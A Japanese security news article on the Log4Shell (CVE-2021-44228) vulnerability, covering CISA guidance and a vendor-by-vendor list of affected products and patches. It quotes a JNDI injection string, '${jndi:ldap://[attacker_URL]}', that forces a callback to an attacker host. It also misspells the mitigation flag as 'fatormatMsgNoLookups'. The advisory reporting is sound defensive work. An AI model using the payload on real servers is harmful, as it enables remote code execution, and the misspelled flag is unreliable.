Apache Log4jロギングライブラリに重大な脆弱性があるというニュースが流れました。
Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションで企業レベルで使用されています。
Apacheは、Log4j 2.15.0をリリースし、最大の深刻度を持つ脆弱性(CVE-2021-44228、Log4ShellまたはLogJamとも呼ばれる)に対応しました。
Cloudflare社とCisco Talos社のデータによると、大規模な悪用が始まったのはエクスプロイトコードが自由に利用できるようになってからですが、今月の初めから攻撃が検出されているようです。
Log4Shellの脆弱性は、アリババのクラウドセキュリティチームによって11月24日に報告されましたが、なぜ一部の攻撃者がこれほど早く悪用できたのかは不明です。
Cybersecurity and Infrastructure Security Agency(CISA)のディレクターであるJen Easterly氏は、同機関が民間および公的機関のパートナーと協力してこの問題に取り組んでいると述べています。
我々はこの脆弱性の防御策を促進し、関連する脅威の活動を検出するため、緊急に行動しています。
我々は、この脆弱性を悪用されている既知の脆弱性のカタログに追加し、連邦政府の民間機関および連邦政府以外のパートナーに、この脆弱性に緊急にパッチを当てるか、修正するように伝えています
Log4Shellは、Java Naming and Directory Interface(JNDI)インジェクションにより、認証されずにリモートでコードを実行することができます。攻撃者は、ブラウザのユーザエージェントを、${jndi:ldap://[attacker_URL]}という形式の文字列に変更することで、この脆弱性を利用できます。
この文字列は、被害者のウェブ・サーバのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックまたはリクエストを強制的に行います。攻撃者はこの文字列を利用して、エンコードされたコマンドやJavaクラスを脆弱なマシンに渡すことができます。
この脆弱性の深刻さと悪用することの容易さを考慮して、CISAは企業がLog4Shell攻撃に対する防御策を設定するためのガイダンスを発表しました。
CISAでは「入手可能なパッチを直ちに適用する」ことを推奨しており、このプロセスには優先順位をつけることが求められています。
まず、ミッションクリティカルなシステム、インターネットに接続されているシステム、ネットワークに接続されているサーバなどにパッチを適用することを優先します。その後、影響を受ける他の情報技術や運用技術資産に優先的にパッチを適用することを推奨します
パッチが当てられない場合は、次のような項目を推奨しています。
Java Virtual Machineのアプリケーション起動コマンドに-Dlog4j2.fatormatMsgNoLookups=Trueという文字列を追加して、log4j2.fatormatMsgNoLookupsをtrueに設定する。
この対応策はバージョン2.10以降でのみ有効です。
Log4Shellの詳細が明らかになった直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果に関する情報を列挙しています。
Amazon
Amazonは、自社製品をアップデートして、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品についてもアップデートを進めているか、近い将来に新しいバージョンをリリースすることを発表しました。
影響を受けたサービスの詳細については、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどが公表されています。
Atlassian
同社によると、デフォルトの設定で悪用される可能性のあるオンプレミス製品はないと考えています。
JMS アペンダー機能を有効にするためにデフォルトのログ設定(log4j.properties)を変更すると、Jira Server & Data Center、Confluence Server & Data Center、Bamboo Server & Data Center、Crowd Server & Data Center、Fisheye、Crucible などの一部の製品で、リモートコード実行のリスクが生じる可能性があります。
Broadcom
Broadcomは、Log4j 脆弱性の影響を受けるいくつかの Symantec 製品について、緩和策とナレッジベースの記事を公開しました。これらの製品には、CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれます。
Cisco
Cisco社は、Log4Shellの影響を受ける製品のリストと、12月14日からのパッチ適用の予定を公開しました。
影響を受ける製品は、次のような様々なカテゴリーの製品です。
- ネットワークおよびコンテンツセキュリティ機器(Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
- コラボレーションおよびソーシャルメディア(Cisco Webex Meetings Server)
- ネットワーク管理とプロビジョニング(Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
- エンタープライズ ルーティングとスイッチング(Cisco Network Assurance Engine、Cisco SD-WAN vManage)
Citrix
調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、CitrixはLog4Shellに対して脆弱性があるとする製品をリストアップしていません。
ConnectWise
ConnectWise社によると、同社のクラウドサービスであるPerchは「潜在的な脆弱性」を持つサードパーティのコンポーネントに依存していることが判明しました。
脆弱性のあるサードパーティは、ConnectWise社のStratoZenソリューションで使用されているFortiGuard社のFortiSIEMであることが判明し、同社はホストされているStratoZenサーバへのアクセスを一時的に制限することになりました。現在ほとんどのサービスへのアクセスが回復しています。
cPanel
フォーラムのスレッドによると、cPanel の Solr プラグインが存在するインスタンスのみが影響を受け、悪用される可能性がありますが、それはローカルのみに影響があります。
Log4Shell の緩和策を含むアップデートが cpanel-dovecot-solr パッケージで利用可能であることを発表しています。
Debian
Debian 9 (Stretch)、10 (Buster)、11 (Bullseye)、12 (Bookworm) には、パッチを適用した Log4j パッケージがセキュリティアップデートとして追加されているとのことです。
Docker
12 個の Docker 公式イメージに、脆弱なバージョンの Log4j ライブラリが使用されていることが判明しました。このリストには、couchbase、elasticsearch、logstash、sonarqube、solrが含まれています。
Docker社は「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新している最中」であり、他の理由でイメージが脆弱でない可能性もあるとしています。
FortiGuard
同社によると、約10種類の同社製品に脆弱性があるとされており、そのうち4種類についてはすでに修正プログラムや緩和策が導入されています。
FortiGuard社は、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなどの他の製品の修正プログラムの適用日を含めて、アドバイザリを更新すると発表しました。
F-Secure
Log4Shellの影響を受けるのは、いくつかのF-Secure製品のWindows版とLinux版の両方です。
Policy Manager (Policy Manager Serverコンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、Elements Connectorです。
同社は、この問題を修正するために管理者向けのセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。
Ghidra
NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係も脆弱性のないイテレーションにアップグレードされました。
IBM
IBM の Log4Shell に関するアドバイザリによると、脆弱性の影響を受けるのは WebSphere Application Server バージョン 9.0 および 8.5 のみで、Admin Console および UDDI Registry Application コンポーネントを介しており、この問題は対処済みであることが示されています。
Juniper Networks
ネットワーク企業であるジュニパーネットワークスは、同社の4つの製品が影響を受けることを明らかにしました。
「Paragon Active Assurance」、「Paragon Insights」、「Paragon Pathfinder」、「Paragon Planner」が対象となります。
また、現段階ではさらに6つの製品が影響を受ける可能性があるとしており、JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director(Security Director Insightsは対象外)となっています。
McAfee
同社はまだ評価を完了しておらず、12製品を調査中としています。
MongoDB
MongoDB Atlas Searchのみ、Log4Shellに対してパッチを当てる必要があると、同社はコメントしています。
開発元は、パッチを展開する前に、悪用された証拠や危険性を示す指標は見つからなかったとしています。
Okta
Oktaは、Log4Shellの脆弱性によるリスクを軽減するために、Okta RADIUS Server AgentとOkta On-Prem MFA Agentのアップデートを公開し、ユーザにはアドミンコンソールから修正プログラムを適用することを強く推奨しています。
Oracle
オラクルは、「いくつかの」自社製品に、脆弱性のあるバージョンの Log4j コンポーネントが使用されていると発表しました。
同社は、My Oracle Support Documentを紹介し、提供されたアップデートを “可能な限り早く “適用することを強く推奨するセキュリティ・アラートを発表しました。
OWASP Foundation
Zed Attack Proxy (ZAP) ウェブアプリスキャナーの 2.11.1 以下のバージョンは、脆弱な Log4j コンポーネントを使用していることが明らかになりました。
RedHat
Red Hat は複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けていることを公表し、アップデートが利用可能になり次第、適用することを強く推奨しています。
これに記載されている製品は、Red Hat OpenShift 4 および 3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、および Red Hat Fuse 7 です。
SolarWinds
Server & Application Monitor(SAM)とDatabase Performance Analyzer(DPA)の2つの製品で、脆弱性のあるバージョンのApache Log4jを使用しています。
ただし、両製品ともに、Logj4の脆弱性の影響を受けないか、リスクを低減したバージョンのJava Development Kit(JDK)を使用しています。
SonicWall
現在進行中の調査により、SonicWall社のEmail Securityバージョン10.xがLog4Shell脆弱性の影響を受けていることが判明しました。
修正プログラムは現在開発中で、”間もなく “リリースされる予定です。
同社のアドバイザリによると、SonicWallの他の5つの製品はまだ調査中であり、残りの製品はこの問題の影響を受けないことが判明しています。
Splunk
Core Splunk Enterprise はData Fabric Search を使用しない限り、影響を受けません。
同社は、Log4Shellの影響を受ける自社製品のバージョンをクラウドとオンプレミスの両方で公開しています。
現時点では一部の製品の修正プログラムをリリースしており、少なくとも7つの製品のローリングアップデートに取り組んでいます。
VMware
VMwareは、Log4Shell攻撃に脆弱ないくつかの製品を修正し、さらに27の製品についてパッチのロールアウトを進めています。
最終更新されたアドバイザリでは、この重要な脆弱性の影響を受ける製品として、約40製品が挙げられています。その多くは「Patch Pending」と表示されており、緩和策が用意されている場合もあります。
Ubiquiti
Log4j ライブラリを使用している UniFi Network Application が更新され、重要な Log4Shell 脆弱性に対応しています。
Ubuntu
セキュリティアドバイザリによると、Log4j パッケージにはアップストリームパッチが適用されており、Ubuntu 18.04 LTS (Bionic Beaver)、20.04 LTS (Focal Fossa)、21.04 (Hirsute Hippo)、21.10 (Impish Indri)にアップデートが適用されています。
Zoho
ManageEngine監視ソリューションの一部であるActive Directoryの変更を監査するADAudit PlusコンポーネントにLog4Shell攻撃の脆弱性があることを発見しました。
Zoho社は、この問題を緩和するための手順を示しています。
Zscaler
Zscaler は、脆弱なバージョンの Log4j ライブラリを使用していた複数の製品にパッチを適用しました。
プライベートアクセス(ZPA)サービス、Zscaler Mobile Admin、Support Mobile Adminコンポーネントのすべてにパッチを適用した結果、同社はすべての製品でこの問題が修正されたと結論付けています。
まとめ
企業の中には特定のJavaバージョンを実行することで悪用される可能性が低くなると考え、Log4Shellの脆弱性への対策を行わないところもあるかもしれません。このような場合には、Log4jライブラリを最新のものに更新する必要があります。
グラフィックデザインプラットフォーム「Canva」のシニアセキュリティエンジニアであるMárcio Almeida氏は、JNDIエクスプロイトキットにLDAPシリアライズドペイロードのサポートが追加されたことで、Log4Shellの攻撃はJavaのどのバージョンでも機能するようになったと警告しています。
Comments